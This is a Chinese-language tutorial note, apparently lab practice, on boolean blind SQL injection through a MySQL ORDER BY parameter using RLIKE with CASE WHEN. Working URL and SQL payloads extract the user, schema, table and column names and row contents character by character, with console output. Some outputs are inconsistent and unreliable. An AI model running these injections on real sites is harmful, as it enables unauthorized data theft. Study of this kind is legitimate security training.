0x00 记忆方式

select * from users order by 1 RLIKE (CASE WHEN (1=1) THEN 1 ELSE 0x28 END)

rlike 函数相当于 regexp ，表示一个正则表示取值

当 1=1 为true时会返回1页面会保持不变
当 1=2 为false时页面会报错

这样就可以根据这个差异来判断是否正确

0x01 基本数据

mysql> select version();
+-----------+
| version() |
+-----------+
| 5.7.26    |
+-----------+
1 row in set (0.00 sec)
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
mysql> select database();
+------------+
| database() |
+------------+
| security   |
+------------+
1 row in set (0.00 sec)
mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

0x02 读取数据库版本/当前连接用户/当前连接的数据库

读取不同的内容
例如:
substring(user(),1,1) = r
substring(user(),2,1) = o

web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring(user(),1,1)=’r’) THEN 1 ELSE 0x28 END)

数据库语句: select * from users order by 1 RLIKE (CASE WHEN (substring(user(),1,1)=’r’) THEN 1 ELSE 0x28 END);

mysql> select * from users order by 1 RLIKE (CASE WHEN (substring(user(),1,1)='r') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

猜对的情况页面会保持不变
错误的情况会爆错/页面数据变为空

mysql> select * from users order by 1 RLIKE (CASE WHEN (substring(user(),1,1)='o') THEN 1 ELSE 0x28 END);
ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp

0x03 猜库名

注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库

// 演示数据
mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)

web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)=’i’ ) THEN 1 ELSE 0x28 END);

读取1库库名第一个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)=’i’) THEN 1 ELSE 0x28 END);

mysql> select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.00 sec)

读取1库库名第二个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)=’n’) THEN 1 ELSE 0x28 END);

mysql> select * from users  order by 1 RLIKE (CASE WHEN (substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)='n') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
13 rows in set (0.00 sec)

0x04 猜表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表

// 演示数据
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
+------------+
| table_name |
+------------+
| emails     |
+------------+
1 row in set (0.00 sec)

web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)=’e’) THEN 1 ELSE 0x28 END)

数据库语句-读取当前库的第一张表名的第一个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)=’e’) THEN 1 ELSE 0x28 END);

mysql> select * from users  order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='e') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
+----+----------+------------+
8 rows in set (0.00 sec)

数据库语句-读取当前库的第一张表名的第二个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)=’m’) THEN 1 ELSE 0x28 END);

mysql> select * from users  order by 1 RLIKE (CASE WHEN (substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)='m') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
+----+----------+------------+
8 rows in set (0.00 sec)

0x05 猜字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

// 演示数据
mysql> SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1;
+-------------+
| column_name |
+-------------+
| id          |
+-------------+
1 row in set (0.00 sec)

web语句: http://www.test.com/sql.php?sort=1

猜security库 users 表的第一个字段名第一个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1)=’i’) THEN 1 ELSE 0x28 END);

mysql> select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
+----+----------+------------+
8 rows in set (0.00 sec)

猜security库 users 表的第一个字段名第二个字: select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),2,1)=’d’) THEN 1 ELSE 0x28 END);

mysql> select * from users order by 1 RLIKE (CASE WHEN (substring((SELECT column_name FROM information_schema.columns where table_schema='security' and table_name='users' limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
+----+----------+------------+
8 rows in set (0.00 sec)

0x06 猜内容

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

mysql> SELECT username FROM test.tdb_admin limit 0,1;
+----------+
| username |
+----------+
| admin    |
+----------+
1 row in set (0.00 sec)

web语句: http://www.test.com/sql.php?sort=1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)=’a’) THEN 1 ELSE 0x28 END);

读取某库某表某字段第一个字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)=’a’) THEN 1 ELSE 0x28 END);

mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),1,1)='a') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 | 1    | 1    | 1       |
|  2 | 2    | 2    | 2       |
|  3 | 3    | 3    | 3       |
+----+------+------+---------+
3 rows in set (0.00 sec)

读取某库某表某字段第二字: select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT 字段名 FROM 库名.表名 limit 0,1),2,1)=’d’) THEN 1 ELSE 0x28 END);

mysql> select * from test order by 1 RLIKE (CASE WHEN (substring((SELECT username FROM test.tdb_admin limit 0,1),2,1)='d') THEN 1 ELSE 0x28 END);
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 | 1    | 1    | 1       |
|  2 | 2    | 2    | 2       |
|  3 | 3    | 3    | 3       |
+----+------+------+---------+
3 rows in set (0.00 sec)

web安全学习

MySQL OrderBy 注入点-布尔盲注